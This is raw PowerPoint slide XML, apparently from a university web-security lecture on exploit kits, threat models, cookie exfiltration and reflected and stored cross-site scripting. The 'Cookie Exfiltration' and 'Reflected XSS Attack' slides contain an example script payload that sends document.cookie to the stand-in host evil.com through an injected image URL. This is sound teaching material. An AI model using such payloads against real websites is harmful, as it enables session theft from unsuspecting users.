              <a:ext cx="5859518" cy="402990"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5859518"/>
                <a:gd name="connsiteY0" fmla="*/ 515195 h 515195"/>
                <a:gd name="connsiteX1" fmla="*/ 1634359 w 5859518"/>
                <a:gd name="connsiteY1" fmla="*/ 36974 h 515195"/>
                <a:gd name="connsiteX2" fmla="*/ 4487918 w 5859518"/>
                <a:gd name="connsiteY2" fmla="*/ 84271 h 515195"/>
                <a:gd name="connsiteX3" fmla="*/ 5859518 w 5859518"/>
                <a:gd name="connsiteY3" fmla="*/ 499429 h 51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59518" h="515195">
                  <a:moveTo>
                    <a:pt x="0" y="515195"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="443186" y="311995"/>
                    <a:pt x="886373" y="108795"/>
                    <a:pt x="1634359" y="36974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2382345" y="-34847"/>
                    <a:pt x="3783725" y="7195"/>
                    <a:pt x="4487918" y="84271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5192111" y="161347"/>
                    <a:pt x="5525814" y="330388"/>
                    <a:pt x="5859518" y="499429"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:head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419520" y="5467835"/>
              <a:ext cx="35526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5) HTTP/1.1 200 OK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71" b="31992"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="871703">
            <a:off x="1516498" y="4220791"/>
            <a:ext cx="2146635" cy="7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7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 Kits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Drive-by attacks have become commoditized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit packs contain tens or hundreds of known browser exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constantly being updated by dedicated teams of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>blackhats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to deploy by novices, no need to write low-level exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MPack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Angler, and Nuclear EX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used in conjunction with legitimate, compromised websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legit site is hacked and modified to redirect to the attackers website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers site hosts the exploit kit as well as a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anyone visiting the legit site is unwittingly attacked and exploited.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261091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 Model Assumptions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516731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Attackers cannot intercept, drop, or modify traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No eavesdropping, no monster-in-the-middle attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS is trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No DNS spoofing or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kaminsky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS and CAs are trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Beast, POODLE, or stolen certs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripts cannot escape browser sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP restrictions are faithfully enforced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser/plugins/extensions are free from vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not realistic, drive-by-download attacks are very common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But this restriction forces the attacker to be more creative ;)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2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4500" dirty="0"/>
              <a:t>Cookie Exfiltration</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 41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document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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.write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225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'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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 dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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="http://evil.com/c.jpg?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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.cookie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'"&gt;'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);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="225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endParaRPr sz="225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lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>DOM API for cookie access (</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Often, the attacker's goal is to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t> this property</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Exfiltration is restricted by SOP...somewhat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Suppose you click a link directing to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>JS from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> cannot read cookies for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>What about injecting code?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>If the attacker can somehow add code into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>, the reading and exporting cookies is easy (see above)</a:t>
            </a:r>
            <a:endParaRPr sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32869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Cross-Site Scripting (XSS)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XSS refers to running code from an untrusted origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually a result of a document integrity violation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Documents are compositions of trusted, developer-specified objects and untrusted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowing user input to be interpreted as document structure (i.e., elements) can lead to malicious code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal authentication credentials (session IDs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or more targeted unauthorized actions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07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XSS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Reflected (Type 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious code is embedded into a crafted hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious code gets included into webpage rendered by visiting the hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored (Type 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker submits malicious code to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server app persists malicious code to storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim accesses webpage that includes stored code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM-based (Type 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Purely client-side injection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74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Vulnerable Website, Type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682685"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose we have a search site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.websearch.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1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http://www.websearch.com/search?q=Christo+Wilson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67543" y="3893976"/>
            <a:ext cx="8870302" cy="27245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73763" y="3906415"/>
            <a:ext cx="8857862" cy="6407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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r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2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526972" y="4027713"/>
            <a:ext cx="3396342" cy="39810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923314" y="4027713"/>
            <a:ext cx="435429" cy="398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10613" y="4881178"/>
            <a:ext cx="3506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Results for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Christo Wilson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10613" y="5544816"/>
            <a:ext cx="551792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Christo Wilson – Professor at Northeastern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.ccs.neu.edu/home/cbw/index.html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88898" y="2666967"/>
            <a:ext cx="2649894" cy="75266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44626" y="4827522"/>
            <a:ext cx="2136501" cy="5689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Vulnerable Website, Type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817" y="2414246"/>
            <a:ext cx="11694366" cy="67559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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.websearch.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“http://img.com/nyan.jpg”/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567543" y="3893976"/>
            <a:ext cx="8870302" cy="27245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73763" y="3906415"/>
            <a:ext cx="8857862" cy="6407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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r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2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526972" y="4027713"/>
            <a:ext cx="3396342" cy="39810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923314" y="4027713"/>
            <a:ext cx="435429" cy="398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10613" y="4881178"/>
            <a:ext cx="1583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Results for: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0" b="11799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3294060" y="4855809"/>
            <a:ext cx="2095500" cy="163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3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Reflected XSS Attack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7531" y="1716057"/>
            <a:ext cx="10506269" cy="9758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/>
              <a:t>http://www.websearch.com/search?q=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>="http://evil.com/?'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'"&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);&lt;/script&gt;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286" y="4650111"/>
            <a:ext cx="1005227" cy="10052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40298" y="5779222"/>
            <a:ext cx="3169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Origin: www.websearch.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>session=xI4f-Qs02fd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09019" y="6176529"/>
            <a:ext cx="1056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evil.com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550" y="3094062"/>
            <a:ext cx="893446" cy="8934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550" y="5269304"/>
            <a:ext cx="893446" cy="89344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327312" y="4034121"/>
            <a:ext cx="1819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websearch.com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585" y="5069440"/>
            <a:ext cx="641882" cy="6418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36" y="3076421"/>
            <a:ext cx="1245186" cy="1245186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3891215" y="5190325"/>
            <a:ext cx="4761373" cy="520997"/>
            <a:chOff x="3891215" y="5190325"/>
            <a:chExt cx="4761373" cy="520997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3891215" y="5505062"/>
              <a:ext cx="4761373" cy="20626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 rot="165159">
              <a:off x="5316028" y="5190325"/>
              <a:ext cx="22028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4) GET /?session=…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10222" y="3052867"/>
            <a:ext cx="2719709" cy="1597244"/>
            <a:chOff x="1710222" y="3052867"/>
            <a:chExt cx="2719709" cy="1597244"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Curved Connector 18"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="18" idx="3"/>
              <a:endCxn id="11" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1710222" y="3699014"/>
              <a:ext cx="1714678" cy="951097"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2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2122598" y="3052867"/>
              <a:ext cx="23073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1) Send malicious link to the victim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818615" y="3509684"/>
            <a:ext cx="4578936" cy="1182798"/>
            <a:chOff x="3818615" y="3509684"/>
            <a:chExt cx="4578936" cy="1182798"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3818615" y="3509684"/>
              <a:ext cx="4578936" cy="118279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 rot="20724147">
              <a:off x="4431969" y="3737297"/>
              <a:ext cx="29962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2) GET </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                <a:t>search?q</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>=&lt;script&gt;…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927513" y="3987508"/>
            <a:ext cx="4488699" cy="1165217"/>
            <a:chOff x="3927513" y="3987508"/>
            <a:chExt cx="4488699" cy="1165217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="11" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3927513" y="3987508"/>
              <a:ext cx="4488699" cy="116521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 rot="20724147">
              <a:off x="4950758" y="4215746"/>
              <a:ext cx="22152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3) HTTP/1.1 200 OK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411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1991: First version of Hypertext Markup Language (HTML) released by Sir Tim Berners-Lee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Markup language for displaying documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contained 18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, including anchor (&lt;a&gt;) a.k.a. a hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1991: First version of Hypertext Transfer Protocol (HTTP) is published</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Berners-Lee’s original protocol only included GET requests for HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP is more general, many request (e.g. PUT) and document types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28204266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Vulnerable Website, Type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730963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose we have a social network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.friendly.com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67543" y="2898710"/>
            <a:ext cx="8870302" cy="3719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79983" y="2911150"/>
            <a:ext cx="8857862" cy="64070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</a:rPr>
              <a:t>   friendly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253274" y="3032448"/>
            <a:ext cx="3396342" cy="39810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36980" y="3772676"/>
            <a:ext cx="2017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What’s going on?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805404" y="4172786"/>
            <a:ext cx="6363478" cy="15251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I hope you like pop-tarts ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.body.style.backgroundImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(' http://img.com/nyan.jpg ')"&lt;/script&gt;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520474" y="5816081"/>
            <a:ext cx="1648408" cy="44787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Update Status</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
